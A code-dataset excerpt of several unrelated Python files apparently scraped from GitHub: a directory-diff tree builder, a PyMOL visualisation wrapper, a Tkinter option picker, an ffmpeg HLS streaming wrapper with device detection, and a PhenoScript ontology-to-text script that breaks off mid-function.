sum([child.stats_deep['files']['old_only'] for child in self.children])\n self.stats_deep['dirs']['old_only'] = self.stats['dirs']['old_only'] + sum([child.stats_deep['dirs']['old_only'] for child in self.children])\n if self.new_path is not None:\n self.stats_deep['files']['new_only'] = self.stats['files']['new_only'] + sum([child.stats_deep['files']['new_only'] for child in self.children])\n self.stats_deep['dirs']['new_only'] = self.stats['dirs']['new_only'] + sum([child.stats_deep['dirs']['new_only'] for child in self.children])\n if self.new_path is not None and self.old_path is not None:\n self.stats_deep['files']['common'] = self.stats['files']['common'] + sum([child.stats_deep['files']['common'] for child in self.children])\n self.stats_deep['dirs']['common'] = self.stats['dirs']['common'] + sum([child.stats_deep['dirs']['common'] for child in self.children])\n\n def __repr__(self):\n return self.full_name\n\n def get_print_line(self, indent=0):\n result = ' ' * indent\n if self.new_path is None:\n result += '(DEL)'\n if self.old_path is None:\n result += '(NEW)'\n if self.new_path is not None and self.old_path is not None:\n result += '(...)'\n result += ' ' + f'{self.name:<10}'\n # add deep stats\n if self.is_same():\n result += ' SAME'\n else:\n result += ' <:({} | {})'.format(self.stats_deep['files']['old_only'], self.stats_deep['dirs']['old_only'])\n result += ' >:({} | {})'.format(self.stats_deep['files']['new_only'], self.stats_deep['dirs']['new_only'])\n 
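# '<:' shows counts that exist only on the old side, '>:' counts only on the new side.\n        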
return result\n\ndef get_tree(old_path, new_path, compare_settings, root_name=''):\n root = Node(root_name, old_path=old_path, new_path=new_path, compare_settings=compare_settings)\n _build_tree(root, compare_settings)\n root._get_stats_deep()\n return root\n\ndef _build_tree(node, compare_settings):\n combined = set()\n if node.old_path is not None:\n combined |= set(node.old_path.keys())\n if node.new_path is not None:\n combined |= set(node.new_path.keys())\n combined = sorted(list(combined))\n for name in combined:\n old_path = node.old_path[name] if (node.old_path is not None and name in node.old_path.keys()) else None\n new_path = node.new_path[name] if (node.new_path is not None and name in node.new_path.keys()) else None\n\n if isinstance(old_path, str): # if it is a file\n old_path = None\n if isinstance(new_path, str): # if it is a file\n new_path = None\n if old_path is None and new_path is None:\n continue\n\n child = Node(name, old_path=old_path, new_path=new_path, parent=node, compare_settings=compare_settings)\n node.children.append(child)\n _build_tree(child, compare_settings)\n\n\nif __name__=='__main__':\n import json\n res = get_directory_structure_v2(\"M:/\")\n with open(\"result.json\", 'w') as json_file:\n json.dump(res, json_file, indent=2)\n","repo_name":"Ar-Kareem/dir_diff","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2776312160","text":"#!/usr/bin/env python2\n\nfrom interface import PymolCommander as Base\nfrom pymol import stored\nfrom pymol import cmd\n\nclass PymolCommander(Base):\n\n def __init__(self):\n self.count=0\n self.connection_count=0\n self.zoom_history=[]\n self.connection_dictionary={}\n\n def showModel(self, model, chainColors, stickColors):\n cmd.do(\"hide\")\n cmd.do(\"bg_color white\")\n cmd.do(\"show cartoon, \"+ str(model))\n chains=[]\n for ch in cmd.get_chains(model):\n chains.append(ch)\n for i in range(0,len(chains)):\n try:\n cmd.do(\"color \"+chainColors[i]+\", chain \"+chains[i])\n except IndexError:\n cmd.do(\"color \" + chainColors[-1] + \", chain \" + chains[i])\n print(\"Error: Detected more chains than colors. 
Last color in color list will be used.\")\n\n cmd.do(\"show spheres, all and not bound_to all\")\n cmd.do(\"util.cnc('all and not bound_to all')\")\n cmd.do(\"show sticks, not pol\")\n cmd.do(\"color \"+stickColors[0]+\", not pol\")\n cmd.do(\"util.cnc('not pol')\")\n\n \n def hideModel(self, model):\n cmd.do(\"hide everything, \"+str(model))\n\n\n def showSticks(self, model, sel, color):\n cmd.do(\"show sticks, \"+str(model)+\" & \" + str(sel))\n cmd.do(\"color \"+str(color)+\", \"+str(model)+\" & \" + str(sel))\n cmd.do(\"util.cnc('\"+str(model)+\" & \" + str(sel)+\"')\")\n\n\n def hideSticks(self, model, sel):\n cmd.do(\"hide sticks, \"+str(model)+\" & \" + str(sel))\n\n\n def showSpheres(self, model, sel, color):\n cmd.do(\"show spheres, \"+str(model)+\" & \" + str(sel))\n cmd.do(\"color \"+str(color)+\", \"+str(model)+\" & \" + str(sel))\n cmd.do(\"util.cnc('\"+str(model)+\" & \" + str(sel)+\"')\")\n\n \n def hideSpheres(self, model,sel):\n cmd.do(\"hide spheres, \"+str(model)+\" and \" + str(sel))\n\n\n def showConnection(self, model, atom1, atom2, color):\n #name=\"connection\"+str(self.connection_count)\n name=str(atom1.split(\"/\")[1]) + \"_\" +str(atom1.split(\"/\")[-1]) + \"--\" + str(atom2.split(\"/\")[1])+\"_\"+str(atom2.split(\"/\")[-1])\n self.connection_dictionary.update({(str(model)+str(atom1)+str(atom2)):(self.connection_count)})\n self.connection_count += 1\n cmd.do(\"distance \"+str(name)+\", /\"+ str(model)+\"//\"+str(atom1)+\", /\"+ str(model)+\"//\"+str(atom2))\n cmd.do(\"color \"+str(color)+\", \"+str(name))\n\n\n def hideConnection(self, model, atom1, atom2):\n id=self.connection_dictionary[str(model)+str(atom1)+str(atom2)]\n cmd.do('hide everything, connection'+str(id))\n\n\n def loadModel(self,path,form):\n if form==\"pdb\" or form==\"prmtop\":\n try:\n cmd.load(path, \"obj\"+str(self.count),0,form )\n self.count+=1\n except:\n print(\"Something went wrong when loading the PDB file\")\n else:\n print(\"Unsupported File Format.\")\n\n \n def loadTraj(self, model,path,form):\n #dont\n pass\n\n def deleteModel(self, model):\n cmd.do(\"delete \" + str(model))\n\n def center(self, model):\n cmd.do(\"center \" + str(model))\n\n def zoom(self, model, sel):\n cmd.do(\"zoom \" + str(model) + \" and \" + str(sel))\n self.zoom_history.append(cmd.get_view())\n if len(self.zoom_history) > 10:\n del self.zoom_history[0]\n\n \n def undoZoom(self):\n try:\n cmd.do(\"set_view \"+str(self.zoom_history[-1]))\n del self.zoom_history[-1]\n except:\n print(\"Number of undoZooms has been exhausted.\")\n\n\n def setFrame(self, model, n):\n #dont\n pass\n\n def read_PDBanalyzer(self,filename,outname,stickColors,chainColors):\n import re\n contacts=[]\n# stickcolors = [\"gray\", \"yellow\", \"red\", \"white\", \"orange\"]\n# chaincolors = [\"green\", \"yellow\", \"red\", \"white\", \"orange\"]\n with open(outname,\"r\") as contact_file:\n contacts_lines=contact_file.readlines()\n for line in contacts_lines:\n contacts.append(line.split())\n #print contacts\n self.loadModel(filename,\"pdb\")\n model=\"obj\"+str(self.count-1)\n self.showModel(model,chainColors,stickColors)\n for i in contacts:\n id1=re.findall(r'\\d+', i[0])\n id2=re.findall(r'\\d+', i[2])\n atom1=str(i[1])+\"/\"+i[0][0:3]+\"`\"+i[0][3:]+\"/\"+i[4]\n atom2=str(i[3])+\"/\"+i[2][0:3]+\"`\"+i[2][3:]+\"/\"+i[5]\n selection=\"chain \"+str(i[1])+\" & resi \"+str(id1[0])+\" + chain \"+str(i[3])+\" & resi \"+str(id2[0])\n cmd.set(\"label_position\", \"(1,1,1)\")\n try:\n color=chainColors[contacts.index(i)]\n except IndexError:\n 
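# more contacts than colors supplied; reuse the last color as a fallback\n                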
color = chainColors[-1]\n self.showSticks(model,selection,\"none\")\n if (\"O\" in i[4]) or (\"N\" in i[4]) or (\"S\" in i[4]):\n if (\"O\" in i[5]) or (\"N\" in i[5]) or (\"S\" in i[5]):\n self.showConnection(model, atom1, atom2, \"yellow\")\n else:\n self.showConnection(model,atom1,atom2,\"black\")\n\n\n\n\n\n\n","repo_name":"sklumpe/pymol_commander","sub_path":"pymol_commander.py","file_name":"pymol_commander.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5000189027","text":"import Tkinter as tk\nimport tkMessageBox\n\n\nclass SelectionList(tk.Tk):\n def __init__(self, list_of_options):\n tk.Tk.__init__(self, None)\n self.title('Select an option')\n self.selection = None\n self.initialize(list_of_options)\n\n def initialize(self, list_of_options):\n frame = tk.LabelFrame(self, text='Select an option')\n frame.grid(\n row=0, columnspan=1, sticky='W', padx=5, pady=5, ipadx=5, ipady=5)\n self.listbox = tk.Listbox(self, width=25, height=10)\n self.listbox.grid(row=0, column=0, sticky='E', padx=5, pady=2)\n for opt in list_of_options:\n self.listbox.insert(tk.END, opt)\n self.listbox.bind('', self._get_selection)\n self.protocol('WM_DELETE_WINDOW', self._on_closing)\n\n def _get_selection(self, event):\n self.selection = self.listbox.get(self.listbox.curselection())\n self.destroy()\n\n def _on_closing(self):\n if tkMessageBox.askokcancel('Quit', 'Do you want to quit?'):\n self.destroy()\n","repo_name":"eo1989/smartcondor","sub_path":"pyOptionAnalyzer/make_selection.py","file_name":"make_selection.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"25287709130","text":"import logging\nimport datetime\nimport sys\nimport threading\nimport subprocess\nfrom subprocess import Popen, PIPE, STDOUT, call\nimport os\nfrom threading import Thread\nimport platform\ntry:\n from Queue import Queue, Empty\n\nexcept ImportError:\n from queue import Queue, Empty\n\n\n__MAC_OS__ = 'Darwin'\n__WINDOWS__ = 'win32'\n__LINUX__ = 'linux'\n__DEFAULT_SYSTEM_VIDEO_DEVICE__ = 0\n__DEFAULT_SYSTEM_AUDIO_DEVICE__ = 0\n__DEFAULT_BROADCAST_RESOLUTION__ = \"640X320\"\n\n\n__MEDIA_NETWORK_STREAMS_LOCATION__ = \"media/\"\n__MEDIA_NETWORK_STREAMS_SEGMENT_DURATION__ = 10\n\n\n\n\ntry:\n sys.path.append('../mod_settings')\n import mod_settings\n \n __MEDIA_NETWORK_STREAMS_LOCATION__ = mod_settings.MEDIA_NETWORK_OUTPUT_LOCATION\n __MEDIA_NETWORK_STREAMS_SEGMENT_DURATION__ = mod_settings.HLS_SEGMENT_DURATION\n\nexcept:\n print(\"- ATTENTION: No mod_settings found, using settings in mod_ffmpegwrapper\")\n #! Attention trailing slash!\n __MEDIA_NETWORK_STREAMS_LOCATION__ = \"media/\"\n __MEDIA_NETWORK_STREAMS_SEGMENT_DURATION__ = 10\n\n\nclass FFmpegCommand:\n '''\n Class that holds different ffmpeg commands in a list required for ffmpeg wrapper.\n '''\n def __init__(self):\n print(\"I was just created\")\n \n def commands(self):\n return [\"apple_hls\",\"rtsp\"]\n \n \n def getCommand(self, options):\n print(\"Getting the options\")\n\n if options[\"format\"]==\"apple_hls\":\n return self.appleHLS(options[\"vid\"], options[\"aid\"], options[\"filelocation\"])\n \n\n else:\n return None\n\n\n def appleHLS(self, vdev, adev, location, options={\n \"frate\":10\n , \"resolution\":__DEFAULT_BROADCAST_RESOLUTION__\n }):\n \n '''\n #! 
todo: should check whether options are given; if not, fall back to defaults.\n        Produces an Apple HLS livestream.\n        '''\n        _frate = str(options[\"frate\"])\n        resolution=str(options[\"resolution\"])\n        streamLocation = __MEDIA_NETWORK_STREAMS_LOCATION__ + location + \"/\"\n        segdur = str( __MEDIA_NETWORK_STREAMS_SEGMENT_DURATION__ )\n        if \"LinuxMint\" in platform.platform():\n            device = \"/dev/video0\"\n            _fa = \"alsa\"\n            _fac = \"2\"\n            #_fac = \"1\" #should be the number behind the comma of _fai\n            _fai = \"hw:0,0\" # on hw:2,0 there are issues in this process; that is the camera audio.\n            _fai = adev\n            _fai = \"hw:3,0\" #Logitech Pro\n            _far = \"44100\"\n            _fv = \"v4l2\"\n            _thread_queue_size = \"1028\"\n            _strict = \"experimental\"\n            _strict2 = \"-2\"\n            \n            return [\"ffmpeg\", \"-f\", _fv, \"-timestamps\", \"abs\", \"-i\", device, \"-thread_queue_size\", _thread_queue_size, \"-f\", _fa,\"-ac\",_fac,\"-i\",_fai, \"-async\", \"100000\", \"-ar\", _far, \"-preset\", \"ultrafast\", \"-c:v\", \"libx264\", \"-tune\", \"zerolatency\", \"-pix_fmt\", \"yuv420p\", \"-profile:v\", \"baseline\", \"-level\", \"1.3\", \"-maxrate\", \"768K\", \"-bufsize\", \"1M\", \"-crf\", \"20\", \"-g\", \"20\", \"-f\", \"hls\", \"-hls_time\", segdur,\"-s\",resolution, \"-threads\",\"0\", \"-force_key_frames\", \"00:00:00.000\", streamLocation + \"playlist.m3u8\"]\n\n        else:\n            #! it's a Mac!\n            device = str(vdev) + \":\" + str(adev)\n            _fv = \"avfoundation\"\n            _strict = \"\"\n            _strict2 = \"\"\n            \n            return [\"ffmpeg\", \"-r\", \"30\", \"-f\", \"avfoundation\", \"-i\", device, \"-pix_fmt\", \"yuv420p\", \"-s\",resolution,\"-hls_flags\", \"round_durations\", \"-hls_time\",\"3\",\"-hls_init_time\",\"3\", streamLocation + \"playlist.m3u8\"]\n\n\nclass FFmpegStreamProcess(object):\n    \"\"\"\n    FFmpeg sort of wrapper.\n    \"\"\"\n    def __init__(self,\n                 options,\n                 cb_Rdy = None):\n        \n        self.options=options\n        #self.options[\"filelocation\"]=options[\"streamlocation\"]+\"/\"+options[\"format\"]\n        #! earlier, videos were stored in format-specific directories: \"apple_hls/...\"\n        #! not anymore.\n        self.options[\"filelocation\"]=options[\"streamlocation\"]\n        self.command=FFmpegCommand().getCommand(options)\n        print(\" \".join(self.command))\n\n        self.terminateMyself = False\n        self.myProcessStopped = False\n        if not os.path.exists( __MEDIA_NETWORK_STREAMS_LOCATION__ + self.options[\"filelocation\"] + \"/\" ):\n            os.makedirs( __MEDIA_NETWORK_STREAMS_LOCATION__ + self.options[\"filelocation\"] + \"/\" )\n            print (\">>> Created Stream location: \" + str(__MEDIA_NETWORK_STREAMS_LOCATION__ + self.options[\"filelocation\"] + \"/\") )\n\n        self.queue = Queue()\n        self.process = None\n    \n    def filename(self):\n        return __MEDIA_NETWORK_STREAMS_LOCATION__ + self.options[\"filelocation\"] + \"/\"\n    \n    \n    def amStopped(self):\n        return self.myProcessStopped\n    \n    def stopStream(self):\n        try:\n            self.terminateMyself = True\n            \n        except Exception as e:\n            print (self.__class__.__name__ + \".stopStream():\")\n            print (\"Could not stop stream... %s\" % self.streamID)\n            print (e)\n    \n    \n    def _queue_output(self, out, queue):\n        '''\n        while ( self.terminateMyself is False ):\n            pass # this is to allow an ffmpeg command to be run externally, whose encoded result will then be uploaded to the server.\n            time.sleep(0.5)\n        print \"***** ATTENTION FFMPEG HAS TO BE STARTED EXTERNALLY FROM RADENIUM OR COMMENT THIS CODE!\"\n        '''\n\n        \"\"\"Read the output from the command bytewise. 
On every newline\n        the line is put to the queue.\"\"\"\n        line = ''\n        try:\n            while (self.process.poll() is None ) and ( self.terminateMyself is False ):\n                chunk = out.read(1).decode('utf-8')\n                if chunk == '':\n                    continue\n                line += chunk\n                if chunk in ('\\n', '\\r'):\n                    queue.put(line)\n                    if \"ThreadLock\" in line:\n                        print (\"Audio Issue, threadlocks again...\")\n                        print (line)\n                    \n                    elif \"error\" in line:\n                        print (\"FFMPEG ERROR!!!:\")\n                        print (line)\n                        if \"hw:\" in line:\n                            print (\"Try fiddling the -ac parameter and pick the right channel 1 or 2 or another one. Make sure -ac is placed before the -i parameter. \")\n                    \n                    line = ''\n\n            out.close()\n\n        except Exception as e:\n            print (self.__class__.__name__ + \": Process was terminated...\")\n            print (e)\n        \n        try:\n            self.process.terminate()\n            self.process = None\n            self.terminateMyself = True\n\n        except Exception as e:\n            print (\"ffmpeg was not started because the process did not exist: \" + str( e ))\n            print (\"Last ffmpeg line: \" + str( line ))\n\n        self.myProcessStopped = True\n    \n    def run(self, daemon=True):\n        \"\"\"\n        Executes the command. A thread will be started to collect\n        the outputs (stderr and stdout) from that command.\n        The outputs will be written to the queue.\n        \"\"\"\n        \n        try:\n            self.process = Popen(self.command, bufsize=5,\n                                 stdin=PIPE, stdout=PIPE, stderr=STDOUT)\n            thread = Thread(target=self._queue_output,\n                            args=(self.process.stdout, self.queue))\n            thread.daemon = daemon\n            thread.start()\n        \n        except Exception as e:\n            print (\"Could not launch stream: \" + str( e ))\n\n        return self\n    \n\n    def readlines(self, keepends=False):\n        \"\"\"\n        Yield lines from the queue that were collected from the\n        command. You can specify if you want to keep newlines at the ends.\n        Default is to drop them.\n        \n        :param keepends: keep the newlines at the end. Default=False\n        \"\"\"\n        while self.process.poll() is None:\n            try:\n                line = self.queue.get(timeout=0.1)\n                if keepends:\n                    yield line\n                else:\n                    yield line.rstrip('\\r\\n')\n            \n            except Empty:\n                pass\n    \n    \n    def __getattr__(self, name):\n        if self.process:\n            return getattr(self.process, name)\n        \n        raise AttributeError\n    \n    \n    def __iter__(self):\n        return self.readlines()\n\n\n\n\nclass ffmpeg_info:\n    \"\"\"! Class to obtain video & audio devices independent of system. \"\"\"\n    \n    def __init__(self):\n        self.log( \"Starting...\" )\n    \n    def log( self, text, level=\"info\" ):\n        log_text = str( datetime.datetime.now() )\n        log_text += \" \"\n        log_text += str( self.__class__.__name__ )\n        log_text += \" \"\n        log_text += text\n        if level == \"warning\":\n            logging.warning( log_text )\n        \n        elif level == \"error\":\n            logging.error( log_text )\n\n        else:\n            logging.info( log_text )\n\n    def getSystem(self):\n        \"\"\"! Return the system name of the operating platform. \"\"\"\n        thisSystem = platform.system()\n        self.log(\"System: \" + str( thisSystem ) )\n        return thisSystem\n    \n    def getSystemDevices(self):\n        \"\"\"! getSystemDevices() returns a dictionary containing all system devices, for example: {\"audio\": [[\"0\", \"Built-in Microphone\"], [\"1\", \"Aggregate Device\"]], \"video\": [[\"0\", \"FaceTime HD Camera\"], [\"1\", \"Capture screen 0\"]]} \"\"\"\n        videodevices = []\n        audiodevices = []\n        if platform.system() == __LINUX__:\n            #! For this to work on Linux, the Video4Linux utilities must be installed.\n            #! installation of video for Linux utilities: sudo apt install v4l-utils\n            #! list camera devices: v4l2-ctl --list-devices\n            #! list usb video capabilities: v4l2-ctl --list-formats-ext\n            #! 
or use: ffmpeg -f v4l2 -list_formats all -i /dev/video0\n \n #! Get a list of all video devices:\n command = [\"v4l2-ctl\", \"-list-devices\"]\n p = subprocess.Popen( command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out = p.communicate()\n \n #! Parsing the terminal output:\n if not \"Failed\" in out[1]:\n devString = \"Video input set to \"\n for line in out[0].split('\\n'):\n #print line\n if devString in line:\n _dev = ( line.split(devString)[1] ).split(\" \")[0]\n #print \"Device = \" + str(_dev)\n videodevices.append([\"/dev/video\"+str(_dev), \"Linux Camera Device \" + str(_dev) ])\n \n else:\n self.log(\"Video utils not installed, use: sudo apt install v4l-utils\", level=\"error\" )\n \n #! Screen grabber is not listed, therefore append it now.\n videodevices.append([\"x11grab\", \"Linux Capture screen\"])\n \n #! Get a list of all audio devices:\n command = ['arecord', '-l']\n p = subprocess.Popen( command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out = p.communicate()\n \n #! Parsing the terminal output:\n for line in out[0].split('\\n'):\n print (line)\n if 'card' in line:\n #! for example: card 2: U0x46d0x825 [USB Device 0x46d:0x825], device 0: USB Audio [USB Audio]\n #! Then get me the 2 indicating which card + a comma like ',' and the device number on the specific card. A card can have multiple devices.\n _alsa = \"hw:\" + ((line.split(',')[0]).split(':')[0]).split(' ')[1] + \",\" + ((line.split(',')[1]).split(':')[0]).split('device ')[1]\n audiodevices.append( [ _alsa, \"Linux \"+ str( ((line.split(',')[1]).split(':')[1])[1:]) ] )\n\n\n elif platform.system() == __MAC_OS__:\n #! Command: ffmpeg -f avfoundation -list_devices true -i \"\"\n ffmpegCommand = [\"ffmpeg\", \"-f\", \"avfoundation\", \"-list_devices\", \"true\", \"-i\", \"\"]\n p = subprocess.Popen( ffmpegCommand, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out = p.communicate()\n\n startVideoList = False\n startAudioList = False\n \n #print(str(out[1]).split(\"\\n\"))\n #! It looks like in python 3 \\n gets escaped or its because of subprocess...\n for line in str(out[1]).split('\\\\n'):\n if \"AVFoundation input device\" in line:\n if \"AVFoundation video devices:\" in line:\n startVideoList = True\n startAudioList = False\n elif \"AVFoundation audio devices:\" in line:\n startVideoList = False\n startAudioList = True\n \n if startVideoList:\n if not \"AVFoundation video devices:\" in line:\n videodevices.append( (line.split('] [')[1]).split('] ') )\n elif startAudioList:\n if not \"AVFoundation audio devices:\" in line:\n audiodevices.append( (line.split('] [')[1]).split('] ') )\n else:\n startVideoList = False\n startAudioList = False\n\n elif platform.system() == __WINDOWS__:\n #! \\todo implement the windows version.\n self.log( \"Oops, our bad... Detection of devices on Windows not yet implemented... 
\", level=\"error\" )\n pass\n\n else:\n pass\n\n sysDevs = {\"video\":videodevices, \"audio\":audiodevices}\n self.log( \"Devices: \" + str( sysDevs ) )\n return sysDevs\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(filename='mod_ffmpegwrapper.log',level=logging.DEBUG)\n info = ffmpeg_info()\n print (info.getSystem())\n print (info.getSystemDevices())\n \n","repo_name":"RYpie/radenium","sub_path":"client/python/addons/mod_ffmpegwrapper/mod_ffmpegwrapper.py","file_name":"mod_ffmpegwrapper.py","file_ext":"py","file_size_in_byte":14246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21151806561","text":"from owlready2 import *\nimport markdown\n\n# ontoPath=\"/Users/taravser/Documents/My_papers/PhenoScript_main/PhenoScript/output/\"\n# ontoFile=\"my_instance.owl\"\n\n# ontoPath=\"/Users/taravser/Documents/My_papers/PhenoScript_main/Semantic_Descriptions/Gryonoides/output/\"\n# ontoFile=\"my_gryo.owl\"\n\nontoPath='/Users/taravser/Documents/My_papers/pheno-repo/Phenoscript/phs_output/'\nontoFile='bees.owl'\n#--\ndef render_using_label(entity):\n return entity.label.first() or entity.name\n\nset_render_func(render_using_label)\n# set_render_func(render_using_iri)\n# set_render_func()\nset_log_level(9)\n#-----------------------\n\n# additional (default) Args\nphs='{https://github.com/sergeitarasov/PhenoScript}'\nns = {'phs': 'https://github.com/sergeitarasov/PhenoScript'}\n\n\nprint('Reading data...\\n')\n\n#--- Read in Ontology\nonto_path.append(ontoPath)\nonto = get_ontology(ontoFile)\nonto.load(reload_if_newer=True, reload=True)\nobo = onto.get_namespace(\"http://purl.obolibrary.org/obo/\")\ninf=onto.get_namespace(\"https://github.com/sergeitarasov/PhenoScript/inference/\")\npato= onto.get_namespace(\"http://purl.obolibrary.org/obo/pato#\")\n\n\n\n\n# does not work\n#Obo = onto.get_namespace(\"http://purl.obolibrary.org/OBO/\")\n#Obo.BFO_0000051\n#-------------------------------\n\n\n# add absence\nfor ind in onto.individuals():\n print(ind)\n if (len(ind.PhenoScript_implies_absence_of)>0):\n #print(ind, \"---\", ind.PhenoScript_implies_absence_of)\n abs_class=ind.PhenoScript_implies_absence_of[0]\n txt=\" [%s](%s): absent\" % (abs_class.label.first(), abs_class.iri)\n print(txt)\n ind.PhenoScript_NL.append(txt)\n\n# SPARQL\n#----------------\n\n\n# female_organism:G_brasiliensis > abdominal_tergum_5:T5_brasiliensis > medial_region:medr5_brasiliensis >> length .is_quality_measured_as measurement_datum:medr5m_brasiliensis .has_measurement_unit_label length << abdominal_tergum_5:T5_brasiliensis;\n# female_organism:G_brasiliensis > measurement_datum:medr5m_brasiliensis .has_measurement_value 0.75;\n\nobo.RO_0000053.iri\nobo.RO_0000053.label\n\n# obo.PATO_0000122 # length\n# obo.RO_0000053 # has_characterristi\n# obo.IAO_0000417 # is qual measured as\n# obo.IAO_0000004 # has measurement value\n# obo.IAO_0000039 # has measurement unit label\n# obo.RO_0000052 # characteristic of\nquery=list(default_world.sparql(\"\"\"\n SELECT ?E0 ?Q ?Val ?x ?Unit ?Unit_loc\n WHERE {?E0 obo:RO_0000053 ?Q .\n ?Q obo:IAO_0000417 ?x .\n ?x obo:IAO_0000004 ?Val .\n ?x obo:IAO_0000039 ?Unit .\n optional {\n ?Unit obo:RO_0000052 ?Unit_loc .\n }\n }\n\"\"\"))\n\n\n\nquery\n\nfor item in query:\n print(item[0])\n\n\n#dict_templ={\"E0\":None, \"Q\":None, \"Val\":None, \"x\":None, \"Unit\":None, \"Unit_loc\":None}\nsparql=[]\nfor item in query:\n print(item)\n dict_templ = {\"E0\": None, \"Q\": None, \"Val\": None, \"x\": None, \"Unit\": None, 
\"Unit_loc\": None}\n dict_templ['E0']= item[0]\n dict_templ['Q'] = item[1]\n dict_templ['Val'] = item[2]\n dict_templ['x'] = item[3]\n dict_templ['Unit'] = item[4]\n if len(item)==6:\n dict_templ['Unit_loc'] = item[5]\n sparql.append(dict_templ)\n\nsparql\n\n\nfor item in sparql:\n print(item['E0'])\n\n# --- Create annotations\n\ndef getLabelPhsAnnotation(ind):\n if ind is not None:\n return \"[%s](%s)\" % (ind.PhenoScript_original_class[0].label.first(), ind.PhenoScript_original_class[0].iri)\n\ndef render_Unit_loc(ind):\n if ind is not None:\n # return \" of \" + ind.PhenoScript_original_class[0].label.first() + \";\"\n return \" of [%s](%s);\" % (ind.PhenoScript_original_class[0].label.first(), ind.PhenoScript_original_class[0].iri)\n else:\n return \";\"\n\nfor item in sparql:\n # Q of E0 = Val, measured in Unit of Unit_loc.\n # Q(L)=Val, unit: Unit(Unit_loc)\n #print(item)\n #txt=\"%s of %s = %s, unit: %s%s\" % \\\n txt = \" %s = %s, unit: %s%s\" % \\\n (getLabelPhsAnnotation(item['Q']),\n #getLabelPhsAnnotation(item['E0']),\n item['Val'],\n getLabelPhsAnnotation(item['Unit']),\n render_Unit_loc(item['Unit_loc']))\n print(txt)\n # inf.PhenoScript_NL\n item['E0'].PhenoScript_NL.append(txt)\n print(\"NL:\", item['E0'].PhenoScript_NL)\n\n\n\n## DELETE\nsparql\n\ndef destroy_entitieS(list):\n for entity in list:\n destroy_entity(entity)\n\n\nfor item in sparql:\n destroy_entitieS([item['Q'], item['Unit']])\n if item['x'] is not None:\n print(item['x'])\n destroy_entity(item['x'])\n\n\n# --- Present queries:\n# obo.BFO_0000051 has part\n\n#FILTER NOT EXISTS { ?y owl:ObjectProperty ?z }\n\nquery=list(default_world.sparql(\"\"\"\n SELECT ?x ?y\n WHERE {\n ?x a owl:NamedIndividual .\n ?y a owl:NamedIndividual .\n ?x obo:BFO_0000051 ?y .\n }\n\"\"\"))\n\n# RO_0002201 # phenotype of\n# every node that should be marks with 'prsent' does not have any single node that is PhenoScript_original_assertion or inf.PhenoScript_NL\n# so if node has those assertions it is not our customer. 
we look for those that have no\npresesnt_tag=set()\nfor trip in query:\n n1=trip[0]\n n2=trip[1]\n has_out_edge=False\n for prop in n2.get_properties():\n if not issubclass(prop, obo.RO_0002201):\n for n3 in prop[n2]:\n asrt = inf.PhenoScript_original_assertion[n2, prop, n3]\n if len(asrt)>0 or issubclass(prop, inf.PhenoScript_NL):\n #if issubclass(prop, owl.ObjectProperty) or issubclass(prop, owl.DatatypeProperty):\n #print(n2, prop, \"is\", asrt)\n has_out_edge = True\n if has_out_edge == False:\n print(n2, prop, \"is\", asrt)\n presesnt_tag.add(n2)\n\n\n\nfor ind in presesnt_tag:\n txt = \": present\"\n print(ind, txt)\n ind.PhenoScript_NL.append(txt)\n\n#---------------------\n\nspp=obo.CDAO_0000138.instances()\nfocal_sp=spp[0]\nfocal_org = focal_sp.IAO_0000219[0]\n\nparts_org=focal_org.BFO_0000051\n\n# taxon name\nfor i in focal_sp.IAO_0000219:\n print(i, i.is_a)\n if (len(i.is_a[0].has_rank) > 0):\n sp_name = '# ' + i.is_a[0].label.first() + '\\n\\n'\n\n\n# DD is the final description\nDD = ''\nvisited_triples=list()\nfor ind in parts_org:\n xx = traverseOntoMark_Overleaf(ind, visited_nodes=set())\n if not xx == ';':\n DD = DD + (str(renderNL(ind))+xx) + '\\n'\n print(str(renderNL(ind))+xx)\n\nprint(DD)\ntype(DD)\nlen(DD)\nxx = DD.replace(\"\\t [\", \"\\t- [\")\nxx = xx.replace(\"\\n [\", \"\\n- [\")\nxx = '-'+xx\nxx = sp_name + xx\nprint(xx)\n\n\n\n# --- Save\n#DD_file = '/Users/taravser/Documents/My_papers/PhenoScript_main/Semantic_Descriptions/Gryonoides/NL/out.txt'\nDD_file = '/Users/taravser/Documents/My_papers/pheno-repo/Phenoscript/NL/bees.md'\nfile1 = open(DD_file, \"w+\")\nfile1.writelines(xx)\nfile1.close()\n\n\n# to markdown\nmarkdown.markdownFromFile(input=DD_file, output='/Users/taravser/Documents/My_papers/pheno-repo/Phenoscript/NL/bees.html')\n\n\n\ndef traverseOntoMark_Overleaf(ind0, tabs=\"\\t\", visited_nodes=set()):\n global visited_triples\n #print(visited_triples)\n txt=\"\"\n visited_nodes.add(ind0)\n triples=[]\n for prop in ind0.get_properties():\n if not issubclass(prop, owl.AnnotationProperty):\n #print(prop)\n for value in prop[ind0]:\n asrt=inf.PhenoScript_original_assertion[ind0, prop, value]\n triple = [ind0, prop, value]\n if len(asrt) > 0 and (triple not in visited_triples): # should be also True for asrt\n #triple = [ind0, prop, value]\n #print(asrt)\n triples.append(triple)\n visited_triples.append(triple)\n #elif issubclass(prop, inf.PhenoScript_NL) or issubclass(prop, inf.PhenoScript_implies_absence_of):\n elif issubclass(prop, inf.PhenoScript_NL):\n for value in prop[ind0]:\n triple = [ind0, prop, value]\n if (triple not in visited_triples):\n #triple = [ind0, prop, value]\n triples.append(triple)\n visited_triples.append(triple)\n if len(triples)==1:\n prop=triples[0][1]\n value=triples[0][2]\n #txt = txt + (\" <%s> %s\" % (prop, value))\n txt = txt + (\"%s%s\" % (renderNL(prop), renderNL(value)))\n if issubclass(prop, owl.ObjectProperty) and (value not in visited_nodes):\n #print(traverseOnto(value))\n #visited_nodes.add(value)\n txt = txt + traverseOntoMark_Overleaf(value, tabs=tabs, visited_nodes=visited_nodes)\n return txt\n if len(triples) > 1:\n for trip in triples:\n # trip= triples[0]\n prop 